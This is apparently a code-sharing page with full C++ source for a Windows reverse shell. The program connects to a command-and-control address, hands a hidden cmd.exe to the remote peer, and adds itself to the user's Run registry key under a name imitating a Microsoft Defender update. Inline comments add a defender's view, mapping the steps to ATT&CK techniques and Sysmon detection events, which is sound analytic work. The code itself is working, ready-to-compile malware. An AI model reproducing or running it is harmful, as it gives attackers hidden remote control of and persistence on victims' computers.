Last active
October 7, 2021 11:04
Reverse shell with persistence, written in C++. Credits: https://github.com/dev-frog/C-Reverse-Shell/blob/master/re.cpp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
| #include <winsock2.h> | |
| #include <windows.h> | |
| #include <ws2tcpip.h> | |
| #include <iostream> | |
| #include <stdio.h> | |
| using namespace std; | |
| #pragma comment(lib, "Ws2_32.lib") | |
| #define DEFAULT_BUFLEN 1024 | |
// RunShell: endless loop that waits 5 seconds, opens a TCP connection to
// C2Server:C2Port and, once the peer has sent any data, starts cmd.exe with
// its standard input, output and error all set to that socket.
//   C2Server - address string handed to inet_addr() (dotted-decimal IPv4).
//   C2Port   - TCP port, converted to network byte order with htons().
// Never returns normally; the only way out is exit(0) when the peer sends
// exactly "exit\n" after the cmd.exe child has ended.
// Defender view (ATT&CK T1059.003, Windows Command Shell): the host-side
// traces of this routine are repeated outbound TCP connects from one process
// at a fixed interval (e.g. Sysmon Event ID 3) and a windowless cmd.exe child
// of that same process created with inherited handles (process-creation
// telemetry such as Sysmon Event ID 1 or Security 4688).
| void RunShell(char *C2Server, int C2Port) | |
| { | |
| while (true) | |
| { | |
// Fixed 5000 ms delay before every attempt, so retries are evenly spaced.
| Sleep(5000); | |
| SOCKET mySocket; | |
| sockaddr_in addr; | |
| WSADATA version; | |
// Winsock is initialised again on every pass; the return value is not checked.
| WSAStartup(MAKEWORD(2, 2), &version); | |
// Group and flags arguments are both 0; the result is not compared with INVALID_SOCKET.
| mySocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); | |
| addr.sin_family = AF_INET; | |
| addr.sin_addr.s_addr = inet_addr(C2Server); | |
| addr.sin_port = htons(C2Port); | |
// Connection failed: release the socket and Winsock, then go back to the Sleep.
| if (WSAConnect(mySocket, (SOCKADDR *)&addr, sizeof(addr), NULL, NULL, NULL, NULL) == SOCKET_ERROR) | |
| { | |
| closesocket(mySocket); | |
| WSACleanup(); | |
| continue; | |
| } | |
| else | |
| { | |
| char RecvData[DEFAULT_BUFLEN]; | |
| memset(RecvData, 0, sizeof(RecvData)); | |
// Blocks until the peer sends something. Only the return code is used; the
// received bytes are never read before the buffer is zeroed again below.
| int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0); | |
| if (RecvCode <= 0) | |
| { | |
| closesocket(mySocket); | |
| WSACleanup(); | |
| continue; | |
| } | |
| else | |
| { | |
| char Process[] = "cmd.exe"; | |
| STARTUPINFO sinfo; | |
| PROCESS_INFORMATION pinfo; | |
| memset(&sinfo, 0, sizeof(sinfo)); | |
| sinfo.cb = sizeof(sinfo); | |
// STARTF_USESHOWWINDOW is set while wShowWindow stays 0 from the memset
// (SW_HIDE), so the child is started without a visible window.
| sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW); | |
// All three standard handles of the child are the connected socket.
| sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)mySocket; | |
// bInheritHandles is TRUE. The return value is not checked, so pinfo is used
// below even when process creation failed.
| CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo); | |
// Blocks until the cmd.exe child exits.
| WaitForSingleObject(pinfo.hProcess, INFINITE); | |
| CloseHandle(pinfo.hProcess); | |
| CloseHandle(pinfo.hThread); | |
| memset(RecvData, 0, sizeof(RecvData)); | |
// This RecvCode shadows the one declared in the enclosing block.
| int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0); | |
| if (RecvCode <= 0) | |
| { | |
| closesocket(mySocket); | |
| WSACleanup(); | |
| continue; | |
| } | |
// An exact "exit\n" from the peer terminates the whole process; any other
// data falls through to the next loop iteration.
| if (strcmp(RecvData, "exit\n") == 0) | |
| { | |
| exit(0); | |
| } | |
| } | |
| } | |
| } | |
| } | |
// main: detaches from the console, writes this executable's full path into
// the current user's Run key, then calls RunShell() with the host and port
// from argv[1]/argv[2] when exactly two arguments are given, otherwise with
// 127.0.0.1 and 4446.
// Defender view: the Run-key write is per-user autostart persistence
// (ATT&CK T1547.001) and the value name imitates a Microsoft Defender
// component (T1036, Masquerading). Registry value-set telemetry on
// HKCU\...\CurrentVersion\Run (e.g. Sysmon Event ID 13) and autostart audits
// expose the entry; a Run value named after Defender whose data points at a
// binary that is unsigned or outside the Defender install path is the
// mismatch to alert on.
| int main(int argc, char **argv) | |
| { | |
// Detach from any console the process was started with.
| FreeConsole(); | |
| char basePath[255] = ""; | |
// Absolute path of argv[0], resolved into basePath and copied into progPath.
| string progPath = _fullpath(basePath, argv[0], sizeof(basePath)); | |
| HKEY hkey = NULL; | |
// Neither createStatus nor status is checked afterwards, and hkey is never
// passed to RegCloseKey in this function.
| LONG createStatus = RegCreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hkey); | |
// NOTE(review): the size argument is scaled by sizeof(wchar_t) although
// progPath is a narrow std::string. Assuming a non-UNICODE build (which the
// narrow string literals imply), the call reads past the string's terminator,
// so the stored value data may carry extra bytes after the path - confirm
// when examining the value.
| LONG status = RegSetValueEx(hkey, "Microsoft Defender Definition Update", 0, REG_SZ, (BYTE *)progPath.c_str(), (progPath.size() + 1) * sizeof(wchar_t)); | |
| if (argc == 3) | |
| { | |
// atoi() reports no errors; a non-numeric argv[2] yields port 0.
| int port = atoi(argv[2]); | |
| RunShell(argv[1], port); | |
| } | |
| else | |
| { | |
| char host[] = "127.0.0.1"; | |
| int port = 4446; | |
| RunShell(host, port); | |
| } | |
| return 0; | |
| } |